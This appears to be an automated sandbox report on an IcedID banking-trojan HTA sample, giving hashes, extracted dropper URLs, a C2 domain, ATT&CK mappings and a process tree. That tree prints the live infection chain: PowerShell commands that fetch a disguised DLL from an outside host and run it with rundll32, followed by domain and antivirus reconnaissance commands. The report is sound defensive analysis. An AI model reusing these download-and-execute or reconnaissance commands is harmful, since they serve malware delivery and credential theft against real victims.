icedid | c815343206eab5b6d29bea2d12f02bf8f446944554f053203afc414acc77e859

General

Target

2.hta
Size

1KB
MD5

78b6f14f36098c269c3d03a29eb35bc8
SHA1

afd76bfe0d6ac105730b218152d0a650b6a869b7
SHA256

c815343206eab5b6d29bea2d12f02bf8f446944554f053203afc414acc77e859
SHA512

57b5a24f6c2610961e5c08d64872290d5b1399a80fc4335e60b88e3d20a679576a108d313b9a710b59e604732e0ea6e91313d65e16a10eb3eda3fe4e503d9712

Score

10^/10

icedid 3954321778 banker collection loader spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://helthbrotthersg.com/view.png

Extracted

Language

ps1

Source

URLs

exe.dropper

https://transfer.sh/get/vpiHmi/invoice.pdf

Extracted

Family

icedid

Campaign

3954321778

C2

ehonlionetodo.com

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid

Blocklisted process makes network request 14 IoCs

Processes:

mshta.exepowershell.exepowershell.exerundll32.exe

flow	pid	process
4	884	mshta.exe
6	884	mshta.exe
9	672	powershell.exe
10	288	powershell.exe
11	672	powershell.exe
14	1436	rundll32.exe
16	1436	rundll32.exe
18	1436	rundll32.exe
20	1436	rundll32.exe
21	1436	rundll32.exe
22	1436	rundll32.exe
23	1436	rundll32.exe
25	1436	rundll32.exe
28	1436	rundll32.exe

Downloads MZ/PE file
Loads dropped DLL 3 IoCs

Processes:

rundll32.exerundll32.exe

pid process

1912 rundll32.exe
1436 rundll32.exe
1436 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1912	rundll32.exe
1436	rundll32.exe
1436	rundll32.exe

Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs

collection

Email Collection

T1114

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 2 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exe

pid process

1712 net.exe
848 net.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

908 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1172 systeminfo.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

pid	process
1712	net.exe
848	net.exe

pid	process
908	ipconfig.exe

pid	process
1172	systeminfo.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 2 IoCs

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\CLSID\{BC5BB61C-04A9-F961-37F7-BFEC8054F70F}	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\CLSID\{BC5BB61C-04A9-F961-37F7-BFEC8054F70F}\ = cc72ba57e4cb079a8007ec9e049a21acef10fb6fa4d269ccfce51332d670d70cdc4e85174a9ee048f269da823947da60a92156bb91e151aefd20156738a287bdff083400f4ab31c936ca1e4a38444b02cc7569d69337671d374488161fcd293874418d2315f1296d8fd215db09755149d0133d91db267f73f33a888622773da3435edd197a631e82992fd70e58ca1fe575b00fade568b55f62bf86bef6484da3843c499b3a70444f47cb9aac9da48916722140b802613b1f4e444706c78cbe0a8c8fef6c24cc110f80c32456cee6fe712c475705c986a4d62f40a083c1f041	rundll32.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exerundll32.exe

pid process

672 powershell.exe
288 powershell.exe
1436 rundll32.exe
1436 rundll32.exe
1436 rundll32.exe
1436 rundll32.exe

pid	process
672	powershell.exe
288	powershell.exe
1436	rundll32.exe
1436	rundll32.exe
1436	rundll32.exe
1436	rundll32.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

powershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	672	powershell.exe
Token: SeDebugPrivilege	288	powershell.exe
Token: SeIncreaseQuotaPrivilege	1760	WMIC.exe
Token: SeSecurityPrivilege	1760	WMIC.exe
Token: SeTakeOwnershipPrivilege	1760	WMIC.exe
Token: SeLoadDriverPrivilege	1760	WMIC.exe
Token: SeSystemProfilePrivilege	1760	WMIC.exe
Token: SeSystemtimePrivilege	1760	WMIC.exe
Token: SeProfSingleProcessPrivilege	1760	WMIC.exe
Token: SeIncBasePriorityPrivilege	1760	WMIC.exe
Token: SeCreatePagefilePrivilege	1760	WMIC.exe
Token: SeBackupPrivilege	1760	WMIC.exe
Token: SeRestorePrivilege	1760	WMIC.exe
Token: SeShutdownPrivilege	1760	WMIC.exe
Token: SeDebugPrivilege	1760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1760	WMIC.exe
Token: SeRemoteShutdownPrivilege	1760	WMIC.exe
Token: SeUndockPrivilege	1760	WMIC.exe
Token: SeManageVolumePrivilege	1760	WMIC.exe
Token: 33	1760	WMIC.exe
Token: 34	1760	WMIC.exe
Token: 35	1760	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1760	WMIC.exe
Token: SeSecurityPrivilege	1760	WMIC.exe
Token: SeTakeOwnershipPrivilege	1760	WMIC.exe
Token: SeLoadDriverPrivilege	1760	WMIC.exe
Token: SeSystemProfilePrivilege	1760	WMIC.exe
Token: SeSystemtimePrivilege	1760	WMIC.exe
Token: SeProfSingleProcessPrivilege	1760	WMIC.exe
Token: SeIncBasePriorityPrivilege	1760	WMIC.exe
Token: SeCreatePagefilePrivilege	1760	WMIC.exe
Token: SeBackupPrivilege	1760	WMIC.exe
Token: SeRestorePrivilege	1760	WMIC.exe
Token: SeShutdownPrivilege	1760	WMIC.exe
Token: SeDebugPrivilege	1760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1760	WMIC.exe
Token: SeRemoteShutdownPrivilege	1760	WMIC.exe
Token: SeUndockPrivilege	1760	WMIC.exe
Token: SeManageVolumePrivilege	1760	WMIC.exe
Token: 33	1760	WMIC.exe
Token: 34	1760	WMIC.exe
Token: 35	1760	WMIC.exe

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

mshta.exerundll32.exerundll32.execmd.exenet.exenet.exe

description	pid	process	target process
PID 884 wrote to memory of 288	884	mshta.exe	powershell.exe
PID 884 wrote to memory of 288	884	mshta.exe	powershell.exe
PID 884 wrote to memory of 288	884	mshta.exe	powershell.exe
PID 884 wrote to memory of 288	884	mshta.exe	powershell.exe
PID 884 wrote to memory of 672	884	mshta.exe	powershell.exe
PID 884 wrote to memory of 672	884	mshta.exe	powershell.exe
PID 884 wrote to memory of 672	884	mshta.exe	powershell.exe
PID 884 wrote to memory of 672	884	mshta.exe	powershell.exe
PID 884 wrote to memory of 1912	884	mshta.exe	rundll32.exe
PID 884 wrote to memory of 1912	884	mshta.exe	rundll32.exe
PID 884 wrote to memory of 1912	884	mshta.exe	rundll32.exe
PID 884 wrote to memory of 1912	884	mshta.exe	rundll32.exe
PID 884 wrote to memory of 1912	884	mshta.exe	rundll32.exe
PID 884 wrote to memory of 1912	884	mshta.exe	rundll32.exe
PID 884 wrote to memory of 1912	884	mshta.exe	rundll32.exe
PID 1912 wrote to memory of 1436	1912	rundll32.exe	rundll32.exe
PID 1912 wrote to memory of 1436	1912	rundll32.exe	rundll32.exe
PID 1912 wrote to memory of 1436	1912	rundll32.exe	rundll32.exe
PID 1912 wrote to memory of 1436	1912	rundll32.exe	rundll32.exe
PID 1436 wrote to memory of 1600	1436	rundll32.exe	cmd.exe
PID 1436 wrote to memory of 1600	1436	rundll32.exe	cmd.exe
PID 1436 wrote to memory of 1600	1436	rundll32.exe	cmd.exe
PID 1600 wrote to memory of 564	1600	cmd.exe	chcp.com
PID 1600 wrote to memory of 564	1600	cmd.exe	chcp.com
PID 1600 wrote to memory of 564	1600	cmd.exe	chcp.com
PID 1436 wrote to memory of 1760	1436	rundll32.exe	WMIC.exe
PID 1436 wrote to memory of 1760	1436	rundll32.exe	WMIC.exe
PID 1436 wrote to memory of 1760	1436	rundll32.exe	WMIC.exe
PID 1436 wrote to memory of 908	1436	rundll32.exe	ipconfig.exe
PID 1436 wrote to memory of 908	1436	rundll32.exe	ipconfig.exe
PID 1436 wrote to memory of 908	1436	rundll32.exe	ipconfig.exe
PID 1436 wrote to memory of 1172	1436	rundll32.exe	systeminfo.exe
PID 1436 wrote to memory of 1172	1436	rundll32.exe	systeminfo.exe
PID 1436 wrote to memory of 1172	1436	rundll32.exe	systeminfo.exe
PID 1436 wrote to memory of 1148	1436	rundll32.exe	net.exe
PID 1436 wrote to memory of 1148	1436	rundll32.exe	net.exe
PID 1436 wrote to memory of 1148	1436	rundll32.exe	net.exe
PID 1148 wrote to memory of 1776	1148	net.exe	net1.exe
PID 1148 wrote to memory of 1776	1148	net.exe	net1.exe
PID 1148 wrote to memory of 1776	1148	net.exe	net1.exe
PID 1436 wrote to memory of 628	1436	rundll32.exe	nltest.exe
PID 1436 wrote to memory of 628	1436	rundll32.exe	nltest.exe
PID 1436 wrote to memory of 628	1436	rundll32.exe	nltest.exe
PID 1436 wrote to memory of 2028	1436	rundll32.exe	nltest.exe
PID 1436 wrote to memory of 2028	1436	rundll32.exe	nltest.exe
PID 1436 wrote to memory of 2028	1436	rundll32.exe	nltest.exe
PID 1436 wrote to memory of 1712	1436	rundll32.exe	net.exe
PID 1436 wrote to memory of 1712	1436	rundll32.exe	net.exe
PID 1436 wrote to memory of 1712	1436	rundll32.exe	net.exe
PID 1436 wrote to memory of 848	1436	rundll32.exe	net.exe
PID 1436 wrote to memory of 848	1436	rundll32.exe	net.exe
PID 1436 wrote to memory of 848	1436	rundll32.exe	net.exe
PID 1436 wrote to memory of 1216	1436	rundll32.exe	net.exe
PID 1436 wrote to memory of 1216	1436	rundll32.exe	net.exe
PID 1436 wrote to memory of 1216	1436	rundll32.exe	net.exe
PID 1216 wrote to memory of 2020	1216	net.exe	net1.exe
PID 1216 wrote to memory of 2020	1216	net.exe	net1.exe
PID 1216 wrote to memory of 2020	1216	net.exe	net1.exe

outlook_office_path 1 IoCs

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe

outlook_win_path 1 IoCs

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2.hta"
1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('http://helthbrotthersg.com/view.png', 'C:\Users\Public\classic.jpg')
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('https://transfer.sh/get/vpiHmi/invoice.pdf', 'C:\Users\Public\invoice.pdf'); Start-Process C:\Users\Public\invoice.pdf
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:672

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1436

C:\Windows\system32\cmd.exe
cmd.exe /c chcp >&2
4⤵
- Suspicious use of WriteProcessMemory
PID:1600

C:\Windows\system32\chcp.com
chcp
5⤵
PID:564

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\system32\ipconfig.exe
ipconfig /all
4⤵
- Gathers network information
PID:908

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:1172

C:\Windows\system32\net.exe
net config workstation
4⤵
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
5⤵
PID:1776

C:\Windows\system32\nltest.exe
nltest /domain_trusts
4⤵
PID:628

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
4⤵
PID:2028

C:\Windows\system32\net.exe
net view /all /domain
4⤵
- Discovers systems in the same network
PID:1712

C:\Windows\system32\net.exe
net view /all
4⤵
- Discovers systems in the same network
PID:848

C:\Windows\system32\net.exe
net group "Domain Admins" /domain
4⤵
- Suspicious use of WriteProcessMemory
PID:1216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "Domain Admins" /domain
5⤵
PID:2020

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

3

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

1

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
340B

MD5
2459c952068a2b2153873409df5e7814

SHA1
792ac7137f576ae525f5227cf7386b71863f9636

SHA256
023cef2e6e7976b88df6d8e0030a86897fd9296630631780c21b12bcb3e764ec

SHA512
bdb3157b05a2671c4ec573088e1c9c6b274ae0eb9f1f3dbde8cada2db8bba73d042035cf9faa8df6877831638e983a9a1860c651626531bbef8eabd5574ca33d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
88aeab0039cfae0c1162500b5e8691e8

SHA1
b864d7f26373bac3343073df41d99ad4d0248a9b

SHA256
d6003bea1e577c4150d70a7b79bc50ee445458966a01e6bf7154ff0a10929578

SHA512
07aff64fb142ad75f8351bdc39da6f895536d30741ed762f632d27e56d9d2b8c6eca7d79b383fc176e621891318714e12239e6124a710fadf92df6b0a0878d7f

Download Submit
C:\Users\Public\classic.jpg
Filesize
291KB

MD5
6b1e64957316e65198e3a1f747402bd6

SHA1
f4df8c9d37a76eadf1125a74865032d83920123b

SHA256
fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe

SHA512
dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff

Download Submit
\??\PIPE\NETLOGON
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\sqlite64.dll
Filesize
1.8MB

MD5
26d773a69f6fad3200d49a7aaa77752b

SHA1
3970ffe8aefe0c30daaec65b85fb103c0fc0f2a7

SHA256
fca6b7fe66ad9973f18f407e83b56dacd04197cbd35efc498a342d73d6a113e5

SHA512
0041b52514460dda19dd065fc46393f6fbe248a4c62fce28e0819abd952756996b34fdea286eb7814a7c868a12656a065278932760e61e53f7102b0dba324e4f

Download Submit
\Users\Public\classic.jpg
Filesize
291KB

MD5
6b1e64957316e65198e3a1f747402bd6

SHA1
f4df8c9d37a76eadf1125a74865032d83920123b

SHA256
fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe

SHA512
dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff

Download Submit
\Users\Public\classic.jpg
Filesize
291KB

MD5
6b1e64957316e65198e3a1f747402bd6

SHA1
f4df8c9d37a76eadf1125a74865032d83920123b

SHA256
fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe

SHA512
dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff

Download Submit
memory/288-61-0x0000000070600000-0x0000000070BAB000-memory.dmp

Filesize
5.7MB

Download
memory/288-60-0x0000000070600000-0x0000000070BAB000-memory.dmp

Filesize
5.7MB

Download
memory/288-54-0x0000000000000000-mapping.dmp

Download
memory/564-78-0x0000000000000000-mapping.dmp

Download
memory/628-85-0x0000000000000000-mapping.dmp

Download
memory/672-62-0x0000000070600000-0x0000000070BAB000-memory.dmp

Filesize
5.7MB

Download
memory/672-59-0x0000000070600000-0x0000000070BAB000-memory.dmp

Filesize
5.7MB

Download
memory/672-56-0x0000000075DF1000-0x0000000075DF3000-memory.dmp

Filesize
8KB

Download
memory/672-55-0x0000000000000000-mapping.dmp

Download
memory/848-89-0x0000000000000000-mapping.dmp

Download
memory/908-80-0x0000000000000000-mapping.dmp

Download
memory/1148-83-0x0000000000000000-mapping.dmp

Download
memory/1172-81-0x0000000000000000-mapping.dmp

Download
memory/1216-90-0x0000000000000000-mapping.dmp

Download
memory/1436-76-0x000007FEFB731000-0x000007FEFB733000-memory.dmp

Filesize
8KB

Download
memory/1436-70-0x0000000001AF0000-0x0000000001B3C000-memory.dmp

Filesize
304KB

Download
memory/1436-69-0x0000000000120000-0x0000000000129000-memory.dmp

Filesize
36KB

Download
memory/1436-67-0x0000000000000000-mapping.dmp

Download
memory/1600-77-0x0000000000000000-mapping.dmp

Download
memory/1712-88-0x0000000000000000-mapping.dmp

Download
memory/1760-79-0x0000000000000000-mapping.dmp

Download
memory/1776-84-0x0000000000000000-mapping.dmp

Download
memory/1912-63-0x0000000000000000-mapping.dmp

Download
memory/2020-91-0x0000000000000000-mapping.dmp

Download
memory/2028-86-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads